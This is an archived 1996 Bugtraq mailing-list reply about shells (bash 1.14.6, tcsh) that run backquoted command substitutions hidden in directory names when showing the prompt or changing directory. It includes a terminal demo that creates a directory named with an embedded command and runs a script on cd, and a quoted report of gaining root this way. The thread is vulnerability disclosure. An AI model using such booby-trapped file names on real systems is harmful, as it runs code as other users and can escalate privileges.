Bugtraq mailing list archives
Re: tee see shell problems
From: ol () niif ru (Oleg Girko)
Date: Tue, 17 Sep 1996 14:47:29 +0400
Hello people! On Mon, 16 Sep 1996, David S. Goldberg wrote:
I just tested a variation of this exploit with bash 1.14.6(1) running on Linux 2.0.13. By using my variation I managed to become root. I find this frightening. In my variation I wasn't as subtle. To use a large portion of the original exploit. Hopefully things like this won't happen, but it is possible. I know that I will forever be much more careful when cd'ing from now on. This is a very simplistic example, but I am sure more difficult ones can be devised.I tried the same with bash 1.14.6(1) on Solaris 2.5 (sparc, though theoretically it shouldn't matter), SunOS 4.1.4, BSDI 2.0.1 and IRIX 5.3, and was unable to perform the exploit using the * wildcard expansion (if I typed in the directory name with the backquote's directly, it did work, which I would expect). I ran bash under truss (on Solaris) and sure enough, the backquote expansion is simply not done. The * expansion generates the backquoted file name, which is passed to chdir. I was able to perform this exploit with tcsh 6.05 on all the above platforms, but not with tcsh 6.04. I don't know why it worked for bash under linux, but I don't have a linux box available to me to check it out.
There is problem in \w substitution in command prompt. Look at this: ol@snark:~ (0/286) cd /tmp ol@snark:/tmp (0/287) echo $PS1 \u@\h:\w (0/\!) ol@snark:/tmp (0/288) mkdir '`. .xxx`' ol@snark:/tmp (0/289) cat > '`. .xxx`'/.xxx #!/bin/sh echo 'YOU LOOSE!!!' ol@snark:/tmp (0/290) cd '`. .xxx`' ol@snark:/tmp/YOU LOOSE!!! (0/291) echo $BASH_VERSION 1.14.6(1) ol@snark:/tmp/YOU LOOSE!!! (0/292) uname -a SunOS snark 5.5 Generic sun4m sparc SUNW,SPARCstation-20 ol@snark:/tmp/YOU LOOSE!!! (0/293) __ / )/ Oleg Girko, sys admin in SPb Univ. Physics Inst. Comp. Centre (__/(_, Email: ol () niif spb su Phone: +7 (812) 428 45 27 http://www.niif.spb.su/~ol/ In some MUDS is known as Luarvic GCM/CS d--(x) H++ s:+> !g p?(3) !au>* a25 w(+) v C++ UB++++$ UL++++$ UU++++$ US++++$ P+ L+ 3++>+++ E N+ K- W-- M-- V- -po+ Y !t !5 !j R G? !tv b+>++ D+ B? e++ u+ h- f+ r->+++ n+ y+(-)>+++
Current thread:
- tee see shell problems test (Sep 13)
- <Possible follow-ups>
- Re: tee see shell problems David S. Goldberg (Sep 16)
- Re: tee see shell problems Alan Cox (Sep 17)
- Re: tee see shell problems Oleg Girko (Sep 17)
- Re: tee see shell problems Paul Szabo (Sep 17)